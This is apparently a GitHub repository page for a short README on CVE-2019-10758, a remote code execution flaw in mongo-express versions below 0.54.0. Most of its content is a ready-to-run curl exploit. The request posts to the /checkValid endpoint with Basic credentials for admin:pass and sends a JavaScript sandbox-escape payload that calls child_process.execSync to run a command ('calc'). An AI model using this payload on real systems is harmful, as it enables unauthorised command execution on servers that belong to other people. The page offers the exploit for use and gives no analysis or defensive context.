Skip to content

Latest commit

 

History

History
 
 

CVE-2019-10758 mongo-express RCE

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
README.md
README.md
 
 

README.md

CVE-2019-10758:mongo-express RCE 无回显

影响版本:

  • mongo-express < 0.54.0

exp:

curl 'http://vulhost:8080/checkValid' -H 'Authorization: Basic YWRtaW46cGFzcw=='  --data 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("calc")'

@masahiro331